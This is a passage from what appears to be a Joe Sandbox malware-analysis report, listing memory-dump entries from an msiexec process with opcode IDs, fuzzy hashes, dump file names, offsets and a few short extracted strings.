                                          • Opcode ID: 6a0bd0fc0700535557d29a20eb72434063a79ddf4cc9b6b1b1bd68af8dfb7104
                                          • Instruction ID: 78e6e1149c81749c672a0a5c76c163029e80210e27ff9d3b35651ef4861ac20d
                                          • Opcode Fuzzy Hash: 6a0bd0fc0700535557d29a20eb72434063a79ddf4cc9b6b1b1bd68af8dfb7104
                                          • Instruction Fuzzy Hash: 772180B0D402099FDB09DFA9D940A8EBFF6FF41704F10C5BAD4549B265EB789A05CB80
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc7445060a3004f65bcaa99639e6b69a7c5bd9ca4abd493737b9af7b15fb751c
                                          • Instruction ID: 9c4ea012b714a387940f85b104fbe6ca9804d7fbdda49a5d33a3419210cd00d6
                                          • Opcode Fuzzy Hash: fc7445060a3004f65bcaa99639e6b69a7c5bd9ca4abd493737b9af7b15fb751c
                                          • Instruction Fuzzy Hash: EC21CF74C0524A8FCB05EFB9C9455EEBFF0BF0A310F10426AE805B2220EB351A45CBA5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db008686f2c89721885513e749fbec632b4e69fc16e12b7225e11ab39f958cb2
                                          • Instruction ID: 176efc95866f34f124063e935d3ce313c9c898b5170f4072ccbc7af853e44173
                                          • Opcode Fuzzy Hash: db008686f2c89721885513e749fbec632b4e69fc16e12b7225e11ab39f958cb2
                                          • Instruction Fuzzy Hash: 30116D70D401098FDB09EFA9D940A8EBFF5FF80705F10C5BAD0049B266EB789A09CB80
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274719379.00000000004BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 004BD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4bd000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                          • Instruction ID: 40fb0540e438da5dbd82fcc1cd80ff999dedaf60f3ead98edb2b74bf80de9b79
                                          • Opcode Fuzzy Hash: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                          • Instruction Fuzzy Hash: 0311D075904244CFCB15CF14C5C4B16BF61FB48318F24C6AAD8494B356C33AD85ACF62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96d69a5f21e29c170d074b18be50ed7a087bb14a244241fa03a876a1f099ca2d
                                          • Instruction ID: b1ef5560d2eb99ddebeaddbcb87611336ebe774515a04c52f40e85ffbfd2e79c
                                          • Opcode Fuzzy Hash: 96d69a5f21e29c170d074b18be50ed7a087bb14a244241fa03a876a1f099ca2d
                                          • Instruction Fuzzy Hash: A30128327042946FCB16AF6A88106AF3FA7DBCA751B18405BF905CB345DD3ACE129794
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f8f9f019c59d02efecd37cdbab527408d31df6e8c117bc13cc8fa791fcc2ca7
                                          • Instruction ID: bf635049141dbce7fd721a5d35707cd9c63978f848a8af639bde4abeabf566c1
                                          • Opcode Fuzzy Hash: 1f8f9f019c59d02efecd37cdbab527408d31df6e8c117bc13cc8fa791fcc2ca7
                                          • Instruction Fuzzy Hash: D7118774D0420A9FCB05DFA8D8409AEBFB1FB89304F2085AAE910A3351D7395A16CF91
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                          • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                          • Opcode Fuzzy Hash: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                          • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8b007c73a5ef77d3c0052dfdc7beca5c32ccfce2e102b6f7dbe2ab2b23fcc46
                                          • Instruction ID: 00cf6acc03e9faeb42c001d89f8e87ba5ffa7f34f87252ce9132cc9a4933a528
                                          • Opcode Fuzzy Hash: b8b007c73a5ef77d3c0052dfdc7beca5c32ccfce2e102b6f7dbe2ab2b23fcc46
                                          • Instruction Fuzzy Hash: 5FD01236D2062686CB15EBA1EC400DEB334EE95265B548626D52936140EB35275986D1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19b7ad3b46ce1f1d8c6a232ca6851ba355244a5770ecd5dc45425fafae8f4869
                                          • Instruction ID: 9174ed515517b334871282f357f8fb60a195ca951fdf0f74075ffcc171ca52d7
                                          • Opcode Fuzzy Hash: 19b7ad3b46ce1f1d8c6a232ca6851ba355244a5770ecd5dc45425fafae8f4869
                                          • Instruction Fuzzy Hash: E3D0673AB400189FCB149F98E8448DDFB76FB98221B048117F915A3261C6319925DB50
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a21af89191dbab50b3fff49307256a8594a755e02e463f98c8a1b5b91f6b4dd
                                          • Instruction ID: 2b82eb9c28f65ec0202916bcc3b8f331223106f1bdbd7a160c1c13c9c6dc863e
                                          • Opcode Fuzzy Hash: 2a21af89191dbab50b3fff49307256a8594a755e02e463f98c8a1b5b91f6b4dd
                                          • Instruction Fuzzy Hash: FCC012301843084EC74DFF65FD45915775EAA80205750C920B50A0655DEF7C9949C794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (o]q$(o]q$,aq$,aq
                                          • API String ID: 0-1947289240
                                          • Opcode ID: cec8c53cc4cb5dc4fe1801efc13578397c8ebe7588fdf5efc4d1d7901b7e727c
                                          • Instruction ID: 16f94d5608e4aa271348c5535c1270abc2ee9deccb71ad850880d651061b2a24
                                          • Opcode Fuzzy Hash: cec8c53cc4cb5dc4fe1801efc13578397c8ebe7588fdf5efc4d1d7901b7e727c
                                          • Instruction Fuzzy Hash: 34124D30A04255DFCB15CF6AC884AAEBBF2BF49322F15846AE805DB361D738DD41CB55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2
                                          • API String ID: 0-450215437
                                          • Opcode ID: b7594bb024f2f697a6d7711a7619b4cd38cfacfea9224e29e2945799c395d6a7
                                          • Instruction ID: ccf124b480894f0e3d1f0b760347d95685d1793329d30bfd8226a5c8411d83fe
                                          • Opcode Fuzzy Hash: b7594bb024f2f697a6d7711a7619b4cd38cfacfea9224e29e2945799c395d6a7
                                          • Instruction Fuzzy Hash: 88515970D01248CBDB04DFAAC5447EEBBB2BF89306F24C52AD4047B295DB799885CF58
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbd3473c2340e6c765fe4c23ac73c8ce65f2b65829e74a4d21a0cc0b6ce8e525
                                          • Instruction ID: d7abbe118dec8cf8f101cdc2b7463a8a475a4e3fadaf9f787df156879ef409e7
                                          • Opcode Fuzzy Hash: cbd3473c2340e6c765fe4c23ac73c8ce65f2b65829e74a4d21a0cc0b6ce8e525
                                          • Instruction Fuzzy Hash: 82C1B074E00218CFDB54DFA5C954B9DBBB2BF89305F2084AAD809AB365DB385E85CF14
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2aca7f62392d35016f3731d627b1ff9f575275e6ffc5c7c5f2c9fd907159da5a
                                          • Instruction ID: 90aacd4453d2095a07a038647e594a77a43d848ee87e074d30852cc5c41f6a9c
                                          • Opcode Fuzzy Hash: 2aca7f62392d35016f3731d627b1ff9f575275e6ffc5c7c5f2c9fd907159da5a
                                          • Instruction Fuzzy Hash: 59517D70D01248CFCB04DFAAD5847EEBBB2FF59306F60852AD405AB296D7399885CF58
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df99b0f9d28a750e0edb4990874fba534adcda228b0b27f2e86cb546f952ebe8
                                          • Instruction ID: ed3be3f6fbec4548ef351e2b2a854bf2bf279fdcac105a8fcb8e582e779289e3
                                          • Opcode Fuzzy Hash: df99b0f9d28a750e0edb4990874fba534adcda228b0b27f2e86cb546f952ebe8
                                          • Instruction Fuzzy Hash: FD516870D01248CFDB04DFAAD5847EEBBB2FF59306F20852AE405AB285D7399885CF58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                          • API String ID: 0-1435242062
                                          • Opcode ID: 98d7b7d57c2c692234a272856c8da6500445de5f2362c39fb292e7d1f9fd2b1e
                                          • Instruction ID: fc489dd9b6653223dab660400da7afe800ad1aab826a169cc97b20cf78825a20
                                          • Opcode Fuzzy Hash: 98d7b7d57c2c692234a272856c8da6500445de5f2362c39fb292e7d1f9fd2b1e
                                          • Instruction Fuzzy Hash: 05129C30A042499FCB14CF6AC984AAEBBF6FF49325F24859AE405DB361D734ED41CB54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FK$FK$FK$FK
                                          • API String ID: 0-1956935488
                                          • Opcode ID: 3bef3456ae68db790bb255afe018e35ff907d5b74a5641ae70a8b2ce38940868
                                          • Instruction ID: 0473d8ebb5b7ad990ee159c42a3fb23b8e4ef3ff6caf1b2b89da356269736ea3
                                          • Opcode Fuzzy Hash: 3bef3456ae68db790bb255afe018e35ff907d5b74a5641ae70a8b2ce38940868
                                          • Instruction Fuzzy Hash: 8641D370A052489FC709EFB9C4416AFBBB2EF85305F2089AED4049B365DB385E42CF95
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.3274894643.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4e0000_msiexec.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \;]q$\;]q$\;]q$\;]q
                                          • API String ID: 0-2351511683
                                          • Opcode ID: 1d23c098345ff822f272269f68ca94638125cf74c91f88fe6cffa3df7a43ecb8
                                          • Instruction ID: 0a4fc4d2ba235bd7d2c4a8e2a33a6042aa9b94e2e3fcd66aee2522d2d6b97e1a
                                          • Opcode Fuzzy Hash: 1d23c098345ff822f272269f68ca94638125cf74c91f88fe6cffa3df7a43ecb8
                                          • Instruction Fuzzy Hash: FC01F7B17401448FC7248E2EC58093A37EABFA8BA2B26447BE445CB376DA35DC41C759